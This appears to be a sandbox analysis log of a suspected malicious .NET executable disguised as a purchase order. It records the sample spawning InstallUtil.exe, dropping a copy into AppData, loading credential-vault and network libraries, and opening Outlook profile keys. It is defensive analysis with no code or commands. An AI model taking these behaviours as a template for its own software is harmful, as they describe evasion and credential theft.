Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Virustotal: Detection: 31%

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

String found in binary or memory: SingularUMatrix5SingularUMatrixWithElement5SingularVectorsNotComputedMSpecialCasePlannedButNotImplementedYet-StopCriterionDuplicate)StopCriterionMissing#StringNullOrEmpty

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

File read: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Iujcy.exe "C:\Users\user\AppData\Roaming\Iujcy.exe"
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Iujcy.exe "C:\Users\user\AppData\Roaming\Iujcy.exe"
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static file information: File size 1559040 > 1048576

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x17c000

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

